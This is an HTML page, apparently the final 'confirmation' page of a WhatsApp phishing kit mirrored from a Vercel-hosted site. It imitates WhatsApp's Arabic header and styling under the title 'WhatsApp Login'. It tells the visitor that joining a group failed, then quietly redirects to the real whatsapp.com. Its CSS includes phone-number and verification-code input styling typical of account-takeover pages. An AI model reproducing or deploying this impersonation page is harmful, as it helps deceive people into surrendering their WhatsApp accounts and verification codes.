-
Notifications
You must be signed in to change notification settings - Fork 0
/
confirmed.html
302 lines (250 loc) · 12.9 KB
/
confirmed.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
<!DOCTYPE html>
<html lang="en">
<meta http-equiv="content-type" content="text/html;charset=utf-8" /><!-- /Added by HTTrack -->
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>WhatsApp Login</title>
<link rel="stylesheet" href="style.css">
<link rel="icon" href="ujTY9i_Jhs1.png">
<meta http-equiv="refresh" content="4; URL=https://whatsapp.com/">
<link rel="icon" href="https://static.whatsapp.net/rsrc.php/v3/yz/r/ujTY9i_Jhs1.png">
<link type="text/css" rel="stylesheet" href="https://static.whatsapp.net/rsrc.php/v3/yI/l/0,cross/C2fHuK6eV5E.css?_nc_x=Ij3Wp8lg5Kz?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="vRp9yOm" crossorigin="anonymous" />
<link type="text/css" rel="stylesheet" href="https://static.whatsapp.net/rsrc.php/v3/y-/l/0,cross/l7NbYm_6epW.css?_nc_x=Ij3Wp8lg5Kz?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="Dpp+Eva" crossorigin="anonymous" />
<link type="text/css" rel="stylesheet" href="https://static.whatsapp.net/rsrc.php/v3/y9/l/0,cross/58P2v5ZIoPt.css?_nc_x=Ij3Wp8lg5Kz?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="X+JXpLn" crossorigin="anonymous" />
<style>
/* Style the select element */
.select-dropdown {
position: relative;
display: inline-block;
width: 200px;
/* Set the desired width */
font-family: Arial, sans-serif;
/* Set the desired font */
font-size: 14px;
/* Set the desired font size */
}
/* Style the select dropdown arrow */
.select-dropdown::after {
content: '\25BE';
/* Unicode character for the down arrow */
position: absolute;
top: 50%;
right: 10px;
transform: translateY(-50%);
pointer-events: none;
}
/* Style the dropdown options */
.select-dropdown select {
appearance: none;
-webkit-appearance: none;
-moz-appearance: none;
width: 100%;
padding: 8px 30px 8px 10px;
border: 1px solid #ccc;
background-color: #fff;
cursor: pointer;
}
/* Style the selected option */
.select-dropdown select option:checked {
background-color: #e0e0e0;
}
/* Style the dropdown when it is open */
.select-dropdown select:focus {
outline: none;
box-shadow: 0 0 4px rgba(0, 0, 0, 0.1);
}
/* Style the select element */
#phoneCountryCode {
border-top: none;
border-left: none;
border-right: none;
width: 108px;
background-color: #f1f1f1;
padding: 10px;
font-size: 16px;
border-bottom: 3px solid #36ba6d;
border-radius: 5px;
}
/* Style the phone input element */
/* Style the form button */
button[type="submit"] {
padding: 10px 20px;
font-size: 16px;
background-color: #4CAF50;
color: #fff;
border: none;
border-radius: 5px;
cursor: pointer;
}
/* Style the form button on hover */
button[type="submit"]:hover {
background-color: #45a049;
}
.input-phone {
border-top: none;
border-left: none;
border-right: none;
width: 75%;
font-size: 21px;
border-bottom: 3px solid #36ba6d;
}
:focus {
outline: none;
}
input::placeholder {
opacity: 75%;
}
._9vcv,
._advm {
border: none;
}
ul.iti__country-list>#iti-0__country-listbox {
list-style-type: none;
margin-right: -266px;
margin-top: 1px;
padding: 0;
}
._9r_7 h4,
._9r_7 ._7gz5,
._9r_7 p,
._9r_7 li,
._9r_7 ol {
font-size: 21px;
line-height: 26px;
}
.iti--separate-dial-code .iti__selected-flag {
background-color: rgba(0, 0, 0, 0.05);
margin-right: -77px;
direction: ltr;
margin-left: 29px;
padding: 2px;
}
.iti--separate-dial-code .iti__selected-dial-code {
margin-left: 4px;
}
.iti__flag.iti__sa {
height: 15px;
background-position: -4339px 0px;
display: none;
}
input::placeholder {
opacity: 75%;
}
ul {
list-style-type: none;
margin-right: -200;
padding: 0;
}
.iti__country-list {
position: relative;
z-index: 2;
list-style: none;
text-align: left;
padding: 0;
margin: 0 0 -5px 23px;
box-shadow: 1px 1px 4px rgba(0, 0, 0, 0.2);
background-color: white;
border: 1px solid #CCC;
white-space: nowrap;
max-height: 200px;
overflow-y: scroll;
-webkit-overflow-scrolling: touch;
}
#phone::placeholder {
font-size: 16px;
text-align: center;
}
.code-input-container {
display: flex;
}
.code-input {
border-top: none;
border-right: none;
border-left: none;
border-bottom: 3px solid #36ba6d;
direction: ltr;
background-color: #f1f1f1;
width: 40px;
height: 40px;
font-size: 18px;
text-align: center;
margin-right: 5px;
}
.btn.btn-default {
background-color: #fff;
color: #333;
border: 1px solid #ccc;
padding: 10px 20px;
border: none;
font-size: 14px;
text-align: center;
text-decoration: none;
display: inline-block;
cursor: pointer;
}
.btn.btn-default:hover {
background-color: #e0e0e0;
}
.btn.btn-default:active {
background-color: #d0d0d0;
}
.btn.btn-default:focus {
outline: none;
box-shadow: none;
}
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Cairo&display=swap" rel="stylesheet">
<style type="text/css">
*{
font-family: 'Cairo', sans-serif;
}
#sidebar-menu li a i{
left: 5px;
}
</style>
</head>
<header class="_af-2 _afwk" data-testid="whatsapp_www_header" id="u_0_0_J5" style="background: #fcf5eb;">
<div class="_afvx">
<div class="_afvy">
<div class="_af8g"><button aria-label="فتح قائمة الهاتف المحمول" class="_afvu _ain3 _9vcv" id="u_0_1_uK"><span class="_advp _aeam"><img src="ZEBI11/Minnu.png"></span></button>
</div>
</div><span class="_afwd"><a data-testid="whatsapp_www_header_logo_link" href="#" class="_9vcv" data-ms="{"creative":"link"}"><span class="_advp _aeam"><img class="_afvz" alt="صفحة واتساب الرئيسية" src="../static.whatsapp.net/rsrc.php/v3/yq/r/mdQNdcFMi0p.png"></span></a></span><span class="_afw1"><a data-testid="whatsapp_www_header_logo_link" href="#" class="_9vcv" data-ms="{"creative":"link"}"><span class="_advp _aeam"><img class="_afvz" alt="صفحة واتساب الرئيسية" src="../static.whatsapp.net/rsrc.php/v3/y7/r/DSxOAUB0raA.png"></span></a></span>
<nav class="_afwe">
<ul class="_afwg">
<li class="_afn_">
<div><button aria-controls="replace_me_subnav" aria-expanded="false" id="u_0_7_NM" class="_9vd5 _aens _afod _afoe"><span class="_afog"><span class="_9vg3 _aj1b" style="">الخصائص</span></span><svg width="8" height="13" fill="none" class="_9vd8 _agnt _afol _afok">
<path d="M7.41 1.91L2.83 6.5l4.58 4.59L6 12.5l-6-6 6-6 1.41 1.41z" fill="currentColor"></path>
</svg></button>
</div>
</li>
<li class="_afn_"><a href="#" class="_9vd5 _aens _afod" target="_self"><span><span class="_afog"><span class="_9vg3 _aj1b" style="">الخصوصية</span></span></span></a></li>
<li class="_afn_"><a href="#" class="_9vd5 _aens _afod" target="_self"><span><span class="_afog"><span class="_9vg3 _aj1b" style="">مركز
المساعدة</span></span></span></a></li>
<li class="_afn_"><a href="#" class="_9vd5 _aens _afod" target="_self"><span><span class="_afog"><span class="_9vg3 _aj1b" style="">المدونة</span></span></span></a></li>
<li class="_afn_"><a href="#" class="_9vd5 _aens _afod" target="_self"><span><span class="_afog"><span class="_9vg3 _aj1b" style="">للأنشطة التجارية</span></span></span></a></li>
</ul>
</nav>
<div class="_agga"><span class="_ag1l">
<span class="AA" style=" width: max-content; padding: 100px; ">
<a href="#" class="_9vd5 _aens _afod" target="_self"><span><span class="_afog"><span class="_9vg3 _aj1b" style="">واتساب
ويب</span></span></span></a></span><a href="#" class="_aeo8 _9vcv _9u4o _9u4i" data-ms="{"creative":"link"}"><span class="_advp _aeam">تنزيل</span><span><svg width="16" height="16" viewBox="0 0 16 16" fill="none" class="_wauiIcon__download-alternative _agnt _9u4c">
<path fill-rule="evenodd" clip-rule="evenodd" d="M13.75 13.75C13.75 14.1642 13.4142 14.5 13 14.5L3 14.5C2.58579 14.5 2.25 14.1642 2.25 13.75C2.25 13.3358 2.58579 13 3 13L13 13C13.4142 13 13.75 13.3358 13.75 13.75Z" fill="currentColor"></path>
<path fill-rule="evenodd" clip-rule="evenodd" d="M8.7487 2C8.7487 1.58579 8.41291 1.25 7.9987 1.25C7.58448 1.25 7.2487 1.58579 7.2487 2L7.2487 9.53955L3.19233 5.51449C2.89831 5.22274 2.42344 5.22458 2.13168 5.5186C1.83993 5.81263 1.84177 6.2875 2.13579 6.57925L7.46912 11.8714C7.76154 12.1616 8.23325 12.1616 8.52567 11.8714L13.859 6.57926C14.153 6.2875 14.1549 5.81263 13.8631 5.5186C13.5714 5.22458 13.0965 5.22274 12.8025 5.51449L8.7487 9.53697L8.7487 2Z" fill="currentColor"></path>
</svg></span></a></span><a href="#" aria-label="تنزيل" class="_afwh _adie _adif"><svg width="16" height="16" viewBox="0 0 16 16" fill="none" class="_wauiIcon__download-alternative _agnt _adid _afbl">
<path fill-rule="evenodd" clip-rule="evenodd" d="M13.75 13.75C13.75 14.1642 13.4142 14.5 13 14.5L3 14.5C2.58579 14.5 2.25 14.1642 2.25 13.75C2.25 13.3358 2.58579 13 3 13L13 13C13.4142 13 13.75 13.3358 13.75 13.75Z" fill="currentColor"></path>
<path fill-rule="evenodd" clip-rule="evenodd" d="M8.7487 2C8.7487 1.58579 8.41291 1.25 7.9987 1.25C7.58448 1.25 7.2487 1.58579 7.2487 2L7.2487 9.53955L3.19233 5.51449C2.89831 5.22274 2.42344 5.22458 2.13168 5.5186C1.83993 5.81263 1.84177 6.2875 2.13579 6.57925L7.46912 11.8714C7.76154 12.1616 8.23325 12.1616 8.52567 11.8714L13.859 6.57926C14.153 6.2875 14.1549 5.81263 13.8631 5.5186C13.5714 5.22458 13.0965 5.22274 12.8025 5.51449L8.7487 9.53697L8.7487 2Z" fill="currentColor"></path>
</svg></a></div>
</div>
</header>
<body style=" background-color: #fcf5eb; ">
<div class="container" style=" margin-block: 100px; ">
<div style=" text-align: center; margin: 20px;">
<img class="_9vx6" src="https://i.pinimg.com/474x/d2/b0/10/d2b01052124d637b98d00d0e595b8965.jpg">
<h4 class="_9vd5 _9scb" style="color:#5E5E5E; font-size: large;">لم يتم الانضمام الى مجموعة واتساب بشكل ناجح <br> المرجوا اعادة المحاولة في وقت اخر</h4>
</div>
</div>
</body>
<!-- Mirrored from newgroup.vercel.app/Confirmed.html?FGDD=Loauyb734HSDHDS783JSDUE7Y34UEUY3GSDGHDSH73JS773USUSUS7ISUS63 by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 03 Oct 2024 08:06:07 GMT -->
</html>